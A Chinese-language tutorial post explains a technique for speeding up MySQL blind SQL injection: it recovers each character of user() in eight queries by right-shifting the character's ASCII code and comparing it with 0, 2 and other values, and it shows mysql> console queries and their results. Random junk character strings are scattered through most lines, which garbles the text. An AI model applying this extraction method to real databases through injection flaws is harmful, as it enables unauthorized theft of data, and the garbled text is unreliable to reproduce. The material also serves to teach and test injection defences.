关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

+ b4 N( ~2 d5 p

下面将以查询mysql数据库当中user()的第一位为例:
9 \  c* J8 `  n' N: I6 L

! r) L+ r6 Y" n- f, }6 v) T3 }
ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

, f  h" Z. A! j8 {

/ x  X' ]8 ^  O/ f; [3 d5 E$ g首先执行如下sql语句:

* K, j. C0 Q- \$ S

mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
& E, x, j1 ~! t


我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
1 G& b* g4 P$ {, Z3 G6 z
! V! C  E4 L0 z+ S* d
* `' Z/ d: V4 s( Q1 a
8 r$ [2 P" T& f$ C' ~2 W第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1



如果运算结果为1,说明第一位为0,不为1
3 y$ L$ V- Y) @5 [/ D
% @3 o" H4 `) Q' x

+————————————–+
3 Y; s$ i; ^  z( ~; h
| (ascii((substr(user(),1,1))) >> 7)=0 |

5 {* N* I6 F. A, h+————————————–+

| 1 |

) u: O3 Z( {; ]' Y; h+————————————–+
& T4 p: U) g! d& ^9 y
5 X; \2 a4 }$ c5 h+ u5 Z- E1 row in set (0.00 sec)

( c2 m# Y- Z7 [这样我们就确定这个8bit的ascii的第一位为0
, c( U% C5 R/ I) Z
/ C0 a& D6 A+ s5 N1 ?$ Z
; Y1 [3 E9 J% G5 ?, m
第二次我们来做6次右偏移来确定前两位



( l1 N, N" c% ?6 R/ X2 g" \) n前两位可能是01或00,即依然可以与0做比较,
- l2 g# D" i2 `0 v
3 y! L! o6 j) \$ a, C6 W5 qmysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+

6 z- B5 Y) v- @& ?| (ascii((substr(user(),1,1))) >> 6)=0 |
) R8 g2 S4 I* Z1 Q
+————————————–+

| 0 |

, O. v) r6 o, Y/ n8 h+————————————–+

1 row in set (0.00 sec)
# [' A) D5 |# `% G2 E

: M/ F! K; a$ v5 J
" t2 X' ]$ I; J2 \结果为0,即第二位为1



开始猜测前三位为010或011
5 f# w: w' {, E. B4 A( y
4 R, J& H- Y5 j9 \
7 w" i2 j; G. ?5 e) F3 ^
* N* h+ r: H; e$ e4 ]让我们看看010和011的ascii码是多少


1 t% n$ Q+ E  l- S
0 D' P. `9 o/ @% Y分别查询select b’011′ select b’010′


9 Y8 I( P4 t! n# r+ \. N0 R
$ x2 L) R4 \4 v1 _( E" D( ?获得结果 010 = 2 011 = 3

* R4 d( M: e7 W  ^' c# |
9 U4 |5 A; H4 n  S+ t8 Y
1 d! V) p" ^* @  [2 o执行如下sql:
) K# l$ Z; S; C# R/ M

5 P6 e: c; n! j0 P' o
2 Z* v9 i. e$ D, P0 l) Y- U/ b* cmysql> select (ascii((substr(user(),1,1))) >> 5)=2;
# l5 ]" P8 j0 g. \7 m: X+ B1 {! E
+————————————–+

. m0 p* V* Q% I0 ]| (ascii((substr(user(),1,1))) >> 5)=2 |
. s4 W$ Y- C# X5 C5 A
" ?6 I* V" o$ x; E# Y5 X+————————————–+
* i8 v$ U  y. i! X
6 O% n* w. f$ W- H3 o" M| 0 |
5 _  w. p8 T9 g( [% Q) J
) G; I! O# U6 C" H" n+————————————–+
9 K( ]/ f9 }4 v) B4 D) g" l4 e
即前三位不为010,而是011
  d7 A9 F& I1 W# X4 K  S
6 X% ~, B: \" J

. m0 o# ^8 J* h1 |+ [: U( s1 G1 ~直到获得最后一位
! c, U# X9 l' j4 S+ l. _) e

! |3 B- U, g9 @8 [4 _* j
最终结果为:01110010
  N/ \, J6 X$ l$ e! }


( ~4 A0 t& E6 h% H! V1 m+ _转换一下:



select b’01110010′
# G% L$ ?- C. A' X/ O2 ~$ W$ k4 x

$ ?9 L; c$ g8 @( p
查询结果



+————-+
+ u. z5 D! b5 a  L2 S
| b’01110010′ |

6 A% S; a- N+ a9 u+————-+
. C( Y% {3 u0 }( N5 O& U! N7 b
; ~7 N  f7 k0 b7 V+ g/ E7 j| r |

  W8 d6 E2 p# I/ q5 o4 s: ]+————-+
" R3 x+ i  I9 \+ W, D
: `" t6 L8 L& ?' M) D1 row in set (0.00 sec)


% ~. w5 e1 C( P; j$ U6 g7 u" Y
这样我们就获得了user()的第一位.其它位依此类推

5 R9 y2 H3 }& y' f2 }% l- X1 D0 ~